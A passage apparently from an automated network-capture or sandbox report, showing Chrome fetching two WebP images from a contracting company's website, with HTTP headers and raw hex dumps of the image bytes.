                                              2024-09-27 06:20:15 UTC8000INData Raw: dc 18 95 2d bc 19 b5 a8 24 7d 8f 97 1a fa ff 1c c7 ff df f6 57 89 cd 97 6a de 55 c0 f3 69 b2 32 19 6c 75 92 98 bc 8c 42 fb f6 f0 c5 80 64 02 30 5d 1b ed b0 c5 b6 d4 a9 2f c0 60 7c a6 cf 6f f8 26 a5 b0 6a 7c 14 59 2c e9 5e 36 65 5b 8d 0c 46 39 54 cb d7 4a 5f 3e f3 68 c7 f3 1f dc 35 ba 94 1f 62 41 82 6b 44 c1 38 8f 7d 07 7b 7e 03 63 17 36 36 2b d5 e2 1f 2b 91 ad 38 90 40 12 a4 c3 c3 4b 30 ef 37 26 7f 9d d6 60 6d 60 12 0e ee 87 96 31 99 bf 84 9d 52 9b 3d 32 66 df aa 5f 5d 3f c7 45 fa 78 f3 a5 6b 80 f3 a9 cc be 5a 96 ac ad 13 a4 65 99 0b 28 8c 3e 15 68 34 b9 14 09 1c 63 7a e7 30 96 e6 93 a5 2c 38 23 ff d8 c2 0f 7d 38 89 df c7 26 82 99 c4 5f 32 02 b8 e0 e3 94 34 48 8b fe 3d 32 cb fb a0 dd 4f a6 ea 07 4d 39 88 21 b2 2e aa 9c 89 38 33 f0 68 71 ea 86 fc d4 62 95
                                              Data Ascii: -$}WjUi2luBd0]/`|o&j|Y,^6e[F9TJ_>h5bAkD8}{~c66++8@K07&`m`1R=2f_]?ExkZe(>h4cz0,8#}8&_24H=2OM9!.83hqb
                                              2024-09-27 06:20:15 UTC8000INData Raw: 0f f5 c2 b0 8d 3a af af dc 91 02 b3 36 25 d6 04 e8 a1 78 49 bf 37 f6 f7 19 13 6a ff dc 8a 81 12 82 89 76 10 ac 3f 26 d9 f3 c2 bc eb 40 f6 92 65 52 f6 8a 3f 61 3f dc 3b 2a 75 54 5e af bd fa a5 1b e7 25 42 9a 8f 84 b2 62 9c 66 f6 8b 93 70 92 76 b2 eb 5e 91 50 55 b3 6a ae 9f ab 26 8a 55 ed dd c6 83 44 02 88 51 5e a2 9a 82 9d 97 f9 18 a9 26 24 98 c3 0e d1 ef 5b a0 55 21 85 8e c7 4d 29 54 76 4b 47 b8 bc 56 c6 31 a9 82 62 e8 59 90 1d 0a f6 73 02 7a ac d4 33 f3 3c 11 67 91 b3 be 55 48 35 46 de 72 65 cb 4b 19 f3 d2 7d b2 23 6d 1f f9 cd 2b 11 76 d3 0f 6b db 7d 0d 1c bc 75 b2 ec ea cb 9c 36 b6 df c6 c6 27 13 90 9f 51 e5 57 31 04 1c 61 87 94 8b 99 16 79 d4 00 2c 79 5b 97 ab df 20 3d d0 f4 c6 3a b4 38 31 b0 0e b5 1b 03 9e 10 dd fa 1c c8 d0 93 9e 32 c9 ed 4f ae 05 aa
                                              Data Ascii: :6%xI7jv?&@eR?a?;*uT^%Bbfpv^PUj&UDQ^&$[U!M)TvKGV1bYsz3<gUH5FreK}#m+vk}u6'QW1ay,y[ =:812O
                                              2024-09-27 06:20:15 UTC8000INData Raw: 39 9a cb 9e 1f 52 e7 80 f6 d3 c9 6e ac ef 5e 13 59 02 ae be 00 79 30 d0 93 7b 30 50 20 48 79 b2 57 a2 57 04 82 91 aa 12 a6 13 4b 41 f0 9e c3 d3 a3 7b c6 df 9c a7 bb 00 9f cb 86 5b b3 c9 2b 31 a4 ea f8 5d b5 a1 4b 7c 83 b8 70 3e 7f d3 20 b2 57 64 f2 90 ad e5 c7 18 3d 5b 1e 32 12 60 72 2f 3c 78 d3 4a 9f 1c 0f 2b ac c6 d3 6b 23 38 64 a4 68 de f3 cd dc 8b 3d 59 87 bd af 2d 82 b4 b0 80 43 86 06 3c 62 5b c3 05 ac ba 09 60 d0 8d 73 ef fb 94 dc 7d fc 5f c6 f3 bd c4 f9 59 c4 9f ff 0e 53 ad 5c b8 10 6e d1 53 8a d8 ed 43 02 27 af 94 2c 7b 2a 83 4a 1e 88 37 7f c3 93 aa fc 33 39 0c 94 bf 94 08 79 2d 74 40 e4 6e 1e 65 60 e9 50 2c 10 b4 f5 4f 6e 19 0a 10 d3 20 9d e8 93 88 63 43 bb 2d 46 38 64 fa 0f 84 fa 8c 60 51 a9 f7 5b 39 1b 20 fd f5 3a 8c 48 bb b2 c9 b0 97 c9 c9 2a
                                              Data Ascii: 9Rn^Yy0{0P HyWWKA{[+1]K|p> Wd=[2`r/<xJ+k#8dh=Y-C<b[`s}_YS\nSC',{*J739y-t@ne`P,On cC-F8d`Q[9 :H*
                                              2024-09-27 06:20:15 UTC8000INData Raw: 20 10 c9 8b 50 b9 89 63 b9 4c 42 b7 00 bd c9 a1 fa 1e cf ba 68 68 12 a0 d9 51 31 98 1e a9 be 8b 97 c9 b6 e5 43 6e f1 86 5f ec ec 06 7b f5 84 e6 0f 55 60 b2 c0 6b bb a7 c0 34 ac 72 f0 c9 a4 55 75 5e c0 a0 e4 dd d7 31 99 ff 3e 00 8a eb eb a1 37 3b 7f 1d 20 04 f1 68 54 1c 1f a9 3e 6b fa c6 19 e9 c3 45 36 8b f5 f7 f7 c2 ce 8c 5a 88 94 34 8b 57 1c 3b c7 ce 89 2a 40 7b 84 cf dc f0 90 5a ba 99 54 78 c9 71 cf 46 b8 3e 9f b7 41 17 96 d1 6d e9 88 63 13 81 24 6a 50 54 e8 66 a3 f2 87 18 6e ba 47 80 91 a1 3f 85 67 57 55 85 bf 7b 5e 3f aa 2a c6 58 98 d3 18 51 aa f2 47 0a 89 36 bd 23 b5 a3 cd e1 a8 03 39 7d c3 47 19 33 33 b5 fd 0d 7d f6 df 3e 0b 3b 0a 56 e2 fc a9 02 92 d3 d6 5a dd d7 37 fd 23 41 a4 53 a2 d6 dd 24 cd de cb 58 b6 e0 9e c5 4a 56 da 99 be 43 02 c5 e9 d3 7b
                                              Data Ascii: PcLBhhQ1Cn_{U`k4rUu^1>7; hT>kE6Z4W;*@{ZTxqF>Amc$jPTfnG?gWU{^?*XQG6#9}G33}>;VZ7#AS$XJVC{
                                              2024-09-27 06:20:15 UTC8000INData Raw: 57 9c 08 ce 5e 1c 4c 93 92 32 36 a6 46 b8 ee fc bf 03 d9 f8 2f 9f 7f be df 39 5e cc 95 64 c2 5c a5 b0 6f 87 09 c2 ef a6 1a f8 09 0b 58 34 c9 d9 2c 4a c2 fa af ee fa a7 af 72 cd 04 f8 30 3a 3f 1b 5c 80 ed 94 ba ef b5 ec 04 37 8f 24 90 c0 43 32 8a 3a 7f 6c 73 b1 64 f3 58 8f ad f1 3f 9f a3 4d e7 3e 40 55 c6 fb ee b0 c9 88 4d 74 76 b6 fc 96 0f 61 2a bf ac 82 18 ea 66 2a 4f 97 5f cb dc 18 49 48 bb 5d 4b e5 73 09 50 bf b7 9b d9 2c 69 bd 44 a0 5d 3f a5 dc 6c a5 d7 5c 2d be 17 1a 57 03 3f 2c b8 2f be fd d9 59 ec 60 f7 66 5a 41 c7 94 fe dc 59 d6 c1 d4 06 3c a3 3e 7e 66 48 48 b8 2d 27 8e cf 39 e6 98 b9 b0 fc 4a bb df 50 06 c5 26 09 ed b9 21 b0 e3 31 13 9d 1c 01 84 d6 bd a9 e0 3f 32 34 97 a9 e2 f6 e4 c0 14 ad 02 78 38 c4 d9 82 53 99 b7 07 b1 27 1d d9 88 25 ce 85 58
                                              Data Ascii: W^L26F/9^d\oX4,Jr0:?\7$C2:lsdX?M>@UMtva*f*O_IH]KsP,iD]?l\-W?,/Y`fZAY<>~fHH-'9JP&!1?24x8S'%X
                                              2024-09-27 06:20:15 UTC8000INData Raw: 02 b3 c5 9d 2c 42 c0 90 92 c8 96 81 d5 3e 2a 3f 27 33 c1 82 3d 39 5b 5f f6 9d f3 18 42 b8 54 4e 82 34 8b 8f 76 25 24 a6 37 c9 94 8c e9 3b 18 da 89 3d ca 9f 7d d2 8a 5c 60 f3 27 a5 a8 49 ad 71 0c 8f 97 44 9f e4 80 f3 ee 6a 02 a0 85 41 99 b8 5d 97 38 c0 a1 5b 38 98 3a b8 5f ad 3c a3 3d 92 2c 81 9d 33 30 21 d2 a2 d8 78 9f cd 1c 26 4a ff 4a 9d e5 91 f8 c1 88 9a 23 2b 7a 83 4f ee f6 c5 e0 a6 f7 85 0d e9 95 8e 55 34 62 89 f9 5a 61 8f 2d 85 ef 7e 97 04 1f 81 ec 97 89 d9 37 8f 0c 5b ad 3d 30 fd 89 8c f8 5f 48 8a 36 25 16 6d 91 41 02 c1 62 5e 07 35 c6 67 0f f6 60 f1 a1 4e 75 cc c6 c5 57 f1 fd c8 4e ad f4 f1 ec 03 8d c6 66 5d 66 5b 44 a1 c5 82 2b 9e 78 f5 ad 0b d5 c3 ff 4b 3b 63 d9 4a 71 8e 96 1c 54 a8 3b d8 77 83 cc 30 09 d6 1b 0a 05 13 0e d4 7a 93 b3 d4 3e 69 40
                                              Data Ascii: ,B>*?'3=9[_BTN4v%$7;=}\`'IqDjA]8[8:_<=,30!x&JJ#+zOU4bZa-~7[=0_H6%mAb^5g`NuWNf]f[D+xK;cJqT;w0z>i@
                                              2024-09-27 06:20:15 UTC621INData Raw: 37 33 fc ac 34 e3 05 a1 f2 9d 8d 91 28 a2 d0 e3 b8 ba 19 69 38 56 b8 cb 18 62 a1 0d 15 24 10 98 e1 ee af 80 f0 5c 38 bd ce 0c 74 f5 13 85 20 c1 b4 7b 74 df 6f 9b 6c 3d 88 ca d3 66 f9 9f db 07 e4 1c 07 67 55 68 95 ba 69 f4 4c b0 5f 19 d6 58 97 b4 4b 41 3d 92 f5 cc 77 f6 69 bf 4c 14 b0 93 ef c6 e0 1f 80 c9 8d 35 69 32 5d 62 9f 01 9c 33 c0 62 d9 d8 b3 aa 2e b7 4e 55 4c 54 cb b4 49 05 1f 4d 18 83 c1 a8 3c 2f ac f4 8d f1 f6 b9 56 fe 80 8d 88 4c 32 93 9e 07 29 1c b1 18 b8 7e 85 12 e1 a1 df 78 73 1a a1 fe c6 30 6e 42 24 a6 ab 68 89 4d 9a 20 13 bd b4 ef 72 78 9a b1 86 56 5f 70 43 18 30 22 9a e7 a2 0b 01 c4 da bc 8e 95 20 5d cb 18 28 a2 12 e1 32 75 70 17 c3 70 fe 7c ca 80 e5 c2 43 bc 8c b7 03 7b 6c 61 5b 60 87 06 4e 79 ce 4a f4 88 3a 3b 6a d7 a4 0b e7 c3 74 40 d5
                                              Data Ascii: 734(i8Vb$\8t {tol=fgUhiL_XKA=wiL5i2]b3b.NULTIM</VL2)~xs0nB$hM rxV_pC0" ](2upp|C{la[`NyJ:;jt@


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              82192.168.2.465418173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:15 UTC724OUTGET /uploads/projects/10/579de64f97d717521a5fc6fcc0eaa118.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:15 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:15 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Mon, 09 Jan 2023 14:27:51 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 56572
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:15 UTC7931INData Raw: 52 49 46 46 f4 dc 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 80 dc 00 00 d0 3e 05 9d 01 2a cf 04 a3 03 3e e9 6e b0 52 a9 26 25 2b a5 51 fa c1 70 1d 09 67 6e dc d8 da df 6f c6 53 f4 fb 1e a3 b8 7a c5 4b ae f2 d3 fe 87 9e 37 f5 3a 74 b3 cb fa 5a 3a 5d e7 e5 ff 36 3f 6e bf da ff de f5 19 e6 bc e0 85 c8 f2 ed 8c fe eb fd bf 50 73 bd f4 0b ee 3c a3 fe 2f f9 6f 35 bf f5 7d 62 7e a7 f6 03 fd 63 fd 5e f7 1b ea 53 f9 ef a2 0f e7 ff e6 7f 71 7d e8 3f ec 7a cf ff 09 ea 01 fd 27 fe 2f 5b 1f a0 07 97 37 b4 37 f6 7f fc 1e 96 9a 9f 9f 69 f2 ab f5 bf f3 7f f9 7f bb f2 af f4 cf d0 fd d3 fb ba e0 1f ee 7b bc f6 f4 ff 8b bf df dd bf b4 f4 14 fd 93 c7 52 18 dd 07 a0 6f d0 ff c4 7a 6e fe 87 9d 5f e1 7f bc f6 02 ff 07 e9 6f fe bf 1c 6f
                                              Data Ascii: RIFFWEBPVP8XVP8 >*>nR&%+QpgnoSzK7:tZ:]6?nPs</o5}b~c^Sq}?z'/[77i{Rozn_oo
                                              2024-09-27 06:20:15 UTC8000INData Raw: 57 af e0 30 06 97 75 4a 9b 53 78 23 38 02 4f 3e 17 4e 05 ae 84 2c df ab ec 04 ce 35 a8 68 fb c2 13 91 a2 0f 21 ce e3 3e 0a 8d 8a a4 a7 1e b9 55 16 ff 9f 07 69 d8 db 14 a0 55 60 ba d0 82 f1 09 df ff 73 ff f6 07 af cd 3a d3 e2 1b af bb b2 68 6a 90 f8 9e 55 01 23 98 bf 57 8a 53 75 72 c9 1d 33 19 85 ae c2 a3 21 4a 23 e3 c4 d9 45 08 3b 03 40 37 a2 01 6f 4b db 5c e4 f4 bf 65 c0 41 14 c5 19 e5 c0 b0 01 d2 7c 1c 79 06 68 76 01 d3 81 7c ad 86 5d ba b2 87 25 77 7f fc a8 8f 65 70 97 64 7a 74 3c d6 20 e8 b5 65 fb 7d 9e a2 50 f3 41 64 19 26 e7 84 09 6a 09 11 66 b9 42 0f c3 d2 94 60 41 93 97 80 f1 85 73 46 69 30 53 bb 2b 6d 25 2f 7e 44 1f 6a 6c ad 8d 1a 8c 18 aa a4 94 b7 4f e1 f2 a7 4d 31 92 de 28 ac 90 05 71 2b 86 f4 bc 60 57 80 6b d1 40 46 85 43 04 b6 6b d4 72 61 9f
                                              Data Ascii: W0uJSx#8O>N,5h!>UiU`s:hjU#WSur3!J#E;@7oK\eA|yhv|]%wepdzt< e}PAd&jfB`AsFi0S+m%/~DjlOM1(q+`Wk@FCkra
                                              2024-09-27 06:20:15 UTC8000INData Raw: d8 42 44 a0 52 b5 ce 16 83 61 ee 72 99 a1 ca 1e c9 d1 d1 43 2a 87 c4 bd 8c 92 0d 72 07 34 ab 8f dd fb c9 37 a0 e6 9a 20 6a 17 ba d3 bc 15 c4 5d b4 85 f9 ae 7f cf 04 45 b7 d6 c5 5b a4 aa c1 7c e0 64 5e e1 43 cb 37 dc 5d 8a 0d 4b da bd f9 e7 2e 3e 9c 8b cd 1e 6e c5 ce dd 17 9c b3 2e dc 13 11 3d 6e 86 d0 ca 63 d6 10 e9 ac 22 ba c7 58 9b 2f c3 66 69 78 d2 10 8a dc ac 86 f2 13 31 5c c8 80 10 b9 6e 9f 14 c3 cc 6c fa 7e 50 ef bc 08 f8 33 cf 08 82 fd 6d 56 f1 74 37 31 5e 78 3e ec 6f 2a 9f 7e f5 a6 6b 3b 31 17 7e a2 b1 35 f1 d2 11 34 58 e4 f1 dc 24 07 db 88 0f 8e 7a 51 eb 53 8e 6e b0 b7 59 dd 27 a0 3f c0 46 75 a2 60 03 29 b9 d5 0a fc f1 e7 bd e4 7c 39 71 3f d0 0f 24 09 c4 50 4d cc 31 ef 66 e5 b6 67 a3 c7 5f 3d 4a 5e ad 2a 8e a8 b9 c5 b4 1d 80 94 62 63 74 14 88 3f
                                              Data Ascii: BDRarC*r47 j]E[|d^C7]K.>n.=nc"X/fix1\nl~P3mVt71^x>o*~k;1~54X$zQSnY'?Fu`)|9q?$PM1fg_=J^*bct?
                                              2024-09-27 06:20:15 UTC8000INData Raw: c1 01 c7 b2 00 df a5 9b cc d5 0a d4 7b 9b 9b 7c 4a 99 b8 43 22 f3 e5 19 bb d0 fe 6c 37 cf 21 33 37 17 82 2e 06 a2 59 89 03 74 ec 69 20 6e 48 90 26 74 dd 5b e2 24 9c 78 7c 7c 96 99 08 8f c5 2d 4a 0c b8 35 68 0d 43 62 56 0e b7 86 0d 6c e3 76 77 59 cd 6f e5 57 46 89 8b e4 8c e2 84 00 7d 34 55 69 6a be cc c1 7c fa c1 0c c1 10 76 14 95 f8 06 a0 86 ad 28 4e bd d8 1b 93 22 d1 9a 76 c7 40 06 f8 06 ec f1 39 a5 6b 91 ab b6 c2 cb 5c 2e 23 2d c7 fe fc 3e b4 77 ad d9 be 25 be ef ce 6b 43 9b 2e af 9a ff d8 94 88 35 e4 4e a8 4a b8 b3 d8 65 ac 70 9f 37 f8 bc 5b d7 a1 c3 50 3a 16 58 4f 48 c7 19 88 49 d6 38 d8 08 6c 35 4a 11 e2 63 b1 71 78 2d 80 e8 44 0d 85 29 e8 bd 91 e6 4e be c7 cb 9f 6d b7 60 88 39 54 4b 32 3e 4a 67 b5 17 7a 2d 56 88 cc 09 0a cd 06 35 92 74 b4 52 af 81
                                              Data Ascii: {|JC"l7!37.Yti nH&t[$x||-J5hCbVlvwYoWF}4Uij|v(N"v@9k\.#->w%kC.5NJep7[P:XOHI8l5Jcqx-D)Nm`9TK2>Jgz-V5tR
                                              2024-09-27 06:20:15 UTC8000INData Raw: 9e bb 65 3d 8d ca 9a 90 55 0d 78 bc 2f c6 6e 12 67 a9 21 40 4a 82 cf af 78 5e fa 76 fa a4 3c df 4e 02 f1 fa 4d d4 ce 1d c1 42 96 c2 73 71 23 9a 22 c4 9f cb a3 d4 17 ef b0 53 7a df 70 34 16 2c d8 db bd 9c 34 53 a6 57 29 2c 50 e6 da 94 51 7f b9 d7 0a 4a 1c 4d b3 df 0f 4a d4 f8 06 9d 15 29 58 0b f8 a1 a4 75 80 9e 06 08 33 c8 7a 31 6a dc d4 db a9 fa 89 69 7a 1f 75 eb 51 a1 f9 3a 49 68 05 f5 d9 68 94 21 f0 95 d9 87 cb 25 3b dc 3c ce 74 ab 90 75 8e fd 2f a5 68 fb 1b 3f 06 48 05 2b 45 27 6d ec bf 07 b7 8f ed 36 d7 b6 02 b8 c6 44 63 73 bb 74 77 bf c8 dc 03 6d 0a 6f 82 81 11 cb 49 62 fb e7 fc 91 00 cf 2a 88 59 5b e0 99 77 51 e7 a6 04 3e 03 dc 36 9d 0f 99 a8 75 83 75 87 5c 0a 9c 44 2c 2c ee 42 63 d1 e9 bf 9c 1e 89 f2 95 af ab 7d 6c 2b 34 87 91 9d 5b ee 49 a0 f2 d4
                                              Data Ascii: e=Ux/ng!@Jx^v<NMBsq#"Szp4,4SW),PQJMJ)Xu3z1jizuQ:Ihh!%;<tu/h?H+E'm6DcstwmoIb*Y[wQ>6uu\D,,Bc}l+4[I
                                              2024-09-27 06:20:15 UTC8000INData Raw: b8 c3 8d 87 87 ed ff f2 1a 5d 1f 85 cd 78 c7 63 ff 3f 64 d0 dd 45 9e 65 27 6d 1c e0 1f cc 27 df e0 a2 7c 44 6d dd d8 3c af 1d 02 44 d1 15 a7 ab de 6a 9a 68 6d 3a f0 9e bd c5 eb 75 52 a5 09 16 82 eb a0 31 d1 d3 7e a1 c1 ec 67 dd 24 fc 48 af 13 17 53 7f f0 18 d5 f9 9f 3a 63 a7 60 ec 08 ee f5 dc 10 7d a0 6b a3 42 30 35 6e 8f 07 21 a0 60 dc 77 74 29 04 76 80 73 f4 0c 72 12 6f 8c a9 3d be 8d 0b 8e 3e 54 c2 b2 62 8b fd 42 bf 44 4d 6e e5 08 0e 9a 66 a6 cb d9 5f 85 eb f3 b9 6e d2 6a de 4a d1 3e bf 65 0b d9 da 96 b4 ad 0e 10 25 2a 7f 4b 1a 18 b0 99 53 53 82 ff 08 5f 29 b8 50 87 2f 58 2f 6f 2a 57 c7 b2 ff 73 e3 99 3b a4 1e 12 13 4f 91 f7 e2 2f ce b4 04 d5 82 98 bc cf cb f4 f7 5d 63 21 92 15 c2 d9 0d 3e 1b f1 03 1b ff 0e b3 f0 5a a5 80 f5 69 ac c9 f2 96 50 0a 36 6e
                                              Data Ascii: ]xc?dEe'm'|Dm<Djhm:uR1~g$HS:c`}kB05n!`wt)vsro=>TbBDMnf_njJ>e%*KSS_)P/X/o*Ws;O/]c!>ZiP6n
                                              2024-09-27 06:20:15 UTC8000INData Raw: 8c 0b 9d a8 2b 64 5d 8d 30 32 5c 5f 42 91 f8 0b 8c 2d 32 f9 45 8d 9c f8 8f d6 e3 e2 7b 23 71 78 9c c3 39 95 3a bf c8 7d fa f4 37 63 bb 67 27 78 5d 08 f8 a9 6f c1 69 41 2b 6b f7 04 c0 a3 2c f8 bd 0c 9e 4d b5 12 29 df 00 94 fd 06 0e 80 e5 f3 12 ef ee f8 0c ca 89 ec 9a 87 36 64 5c 9f 9a 28 dd 82 fd 95 fc 86 26 7f 23 df fa e3 4d 86 de 5a a3 c6 49 8f f3 5b d8 ba 66 6a 9e 0b b5 c8 77 61 8e 94 0a 7f ce 97 7f 21 0c 36 f0 b1 90 23 76 f1 da a4 f4 3b c4 05 c6 d7 1c 7d b7 35 c9 c0 1b 18 d4 59 c1 36 8e 16 52 ad c1 f3 d1 be ba d4 50 42 49 22 9e 1e 47 b3 0c 84 35 a7 4e 9a d2 d5 94 ca b0 8c 56 10 56 26 9f 0d 28 9a 84 dd 01 6f 7b fa 0a 20 45 7f dc 94 6b 30 e6 0b 4b 53 29 6d f2 9c 7d c8 8c e9 c4 1d 64 4a 4f 59 a6 86 fc 48 fa 13 17 54 bb e4 45 e7 b9 69 a1 44 04 9d 92 07 38
                                              Data Ascii: +d]02\_B-2E{#qx9:}7cg'x]oiA+k,M)6d\(&#MZI[fjwa!6#v;}5Y6RPBI"G5NVV&(o{ Ek0KS)m}dJOYHTEiD8
                                              2024-09-27 06:20:15 UTC641INData Raw: dd 98 b8 92 5d 12 ac 03 f2 17 a0 3b 79 55 18 fc 67 f0 df 2b 46 ff db c9 7b cd 81 41 d7 84 66 3f 47 ef 67 bc 06 74 bd 49 13 13 d9 fd 93 ab d7 ec c2 df 6e 8f a6 a3 b6 95 2d c3 f7 d7 83 1e 56 f5 c7 e5 f9 18 ef 3e e7 cc 84 11 f6 44 42 39 f1 6f cf f4 5e 46 bd 86 f1 c4 cd 8b 23 3e 3d ab ce 1e a7 a6 a3 12 9f 8b df c5 1e 23 8d 89 4c e8 f3 1c c7 d0 fd fc d2 a2 1e 6a ba 75 d4 0e d8 14 0f b2 20 b4 50 aa 0a 64 c8 76 ba 24 19 a2 ce f7 78 9b ad d8 19 c3 29 88 26 4e f3 01 8c aa fa 06 8c b1 1d 95 d9 0e a0 b4 29 c6 3e f0 05 a1 79 63 5f 84 f9 0c 0c 6b 9a 3d 24 c5 72 e3 ab 98 c2 04 ef 8c fa 98 a3 fd fe f8 18 6f e6 7a 18 29 4c 67 2d c9 6a 11 47 1b 13 98 6b ba 16 05 20 f4 5a d7 74 fa a3 84 53 1a f5 0b 97 3c e3 9a c4 ec b6 6e 71 1b 19 8d e7 ec bd 7d 57 5f 70 2d 5f 8b f6 0e d7
                                              Data Ascii: ];yUg+F{Af?GgtIn-V>DB9o^F#>=#Lju Pdv$x)&N)>yc_k=$roz)Lg-jGk ZtS<nq}W_p-_


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              83192.168.2.465417173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:15 UTC724OUTGET /uploads/projects/15/6a0a747aec6891a7650e250b247f7939.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:15 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:15 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 10:48:37 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 45240
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:15 UTC7931INData Raw: 52 49 46 46 b0 b0 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 3c b0 00 00 f0 ea 03 9d 01 2a cf 04 a3 03 3e e9 6e af 53 29 26 33 ac 24 72 4a 5a 70 1d 09 69 41 8b c5 67 bb fd 5c fb b9 c6 43 5f a4 78 80 fd 63 e1 c2 3d 0e f3 1c f5 7f eb f4 d7 3f 12 b1 9b 31 64 36 4f d3 51 a6 38 68 79 14 f4 c2 f1 cb a9 1d 0d 2c 77 ff 79 dd b9 c5 e5 91 2f ab 79 cc 5f b7 fd 77 ff 5f 9a 8f aa f5 ff fa 37 62 2f fa 59 37 fb 5f 07 7f bd 7f 24 cf 47 f8 5e 05 fe b7 fc d7 ec ef b0 8e 24 f6 a3 6a 7f f0 ff fa 7f b7 f6 11 f6 9f ee 3f b4 be dc ff b3 e7 8f f9 7e a0 bf e2 fd 2d f1 3d f5 ff 61 6f e7 df eb 3d 64 7f e8 f3 e1 fb 37 9d d7 5e 52 52 fa b6 2d 60 8c cf a7 8a 02 25 d4 10 11 2e a0 80 89 75 04 04 4b a8 20 23 57 f4 f1 40 44 ba 82 02 25 d4 10 11 2e
                                              Data Ascii: RIFFWEBPVP8XVP8 <*>nS)&3$rJZpiAg\C_xc=?1d6OQ8hy,wy/y_w_7b/Y7_$G^$j?~-=ao=d7^RR-`%.uK #W@D%.
                                              2024-09-27 06:20:15 UTC8000INData Raw: 2f e4 e0 88 c2 6d 27 25 7f 16 02 3a 91 ed ec fc 9b 1d c1 79 96 e5 c8 0f f9 c6 a8 88 39 fa f1 b7 4d cd 66 7a b9 d5 ae 4e 02 8e 64 f4 2b 26 e6 12 87 a9 46 14 b1 d6 f3 3d b0 bf 24 27 90 38 91 16 96 e1 0f cf 3b 03 54 b7 6f 9c 00 3c 86 0b c0 1e 7c ee ca 55 3b 61 b4 4d e7 c2 9f 33 7d 8e ec fe 78 c2 66 a2 e0 b6 9f d1 64 c8 23 77 a1 4a 02 9f df eb 29 27 c2 c3 38 b1 c0 07 8f a0 22 75 2e 48 f7 d3 25 64 78 d9 76 be df 08 00 00 fe f1 b8 c0 b7 0f 43 a0 56 d6 56 56 b7 b7 20 93 69 2b d9 a0 db 1d 72 7c d3 ab bd b9 b7 dd ae 32 9e 34 77 b4 8e ab 86 7b cc 3c 77 d3 79 62 09 b2 ef b0 78 60 ed ac f2 70 fe 75 9a d9 0c 75 e4 00 4e de 04 32 b4 7f 25 ef 68 98 dd ca db f8 f9 2b 82 75 db f0 da 50 07 79 13 c0 08 1d 46 d0 ba 0d cb 23 c8 b0 99 82 73 80 b0 a5 25 05 8a 75 75 12 68 30 9f
                                              Data Ascii: /m'%:y9MfzNd+&F=$'8;To<|U;aM3}xfd#wJ)'8"u.H%dxvCVVV i+r|24w{<wybx`puuN2%h+uPyF#s%uuh0
                                              2024-09-27 06:20:15 UTC8000INData Raw: 9f d7 39 72 5e e6 35 f9 aa 20 86 92 d6 5f d8 cc f2 c0 4b 88 88 00 d6 fe 9d 17 ac 18 41 59 ac 3a 53 e3 b8 85 68 41 68 fd ef 6f 6e c7 30 20 a0 54 43 b8 59 20 4d 00 81 c6 89 b3 83 a7 80 b7 38 d1 37 61 cb 36 35 b1 33 1f 4d 95 c4 56 69 df 42 8a 6e c4 13 ad 12 f7 09 28 ef 1c 1e df 6d c7 0d 21 46 e9 c9 42 bb e1 ad 58 ec 4e bb b3 b6 43 8e 20 17 c3 1c da 23 af 86 60 08 df ab 15 81 02 0b 54 fc b8 98 e8 cd 2d eb 77 1e 47 70 70 99 47 61 c9 bc 60 de 68 a5 bb 87 5d 8d 0a c5 e2 f8 ec c8 3e 63 19 9f bc ea 7e b7 e8 42 13 e4 80 56 1a e2 bb a8 ea 99 28 01 03 27 1a 6c 9c f0 86 a2 3c bb a7 d4 3c 2b 59 31 3f 6d c6 31 2f b1 f8 6a 42 c3 77 f9 43 05 bb fb 04 96 99 c5 e9 da 2c da 30 6b a3 26 f3 06 7b e6 24 51 2b be e2 d7 d4 4f 82 52 70 90 34 05 99 75 4b 18 26 e5 cf e3 38 e8 cd d8
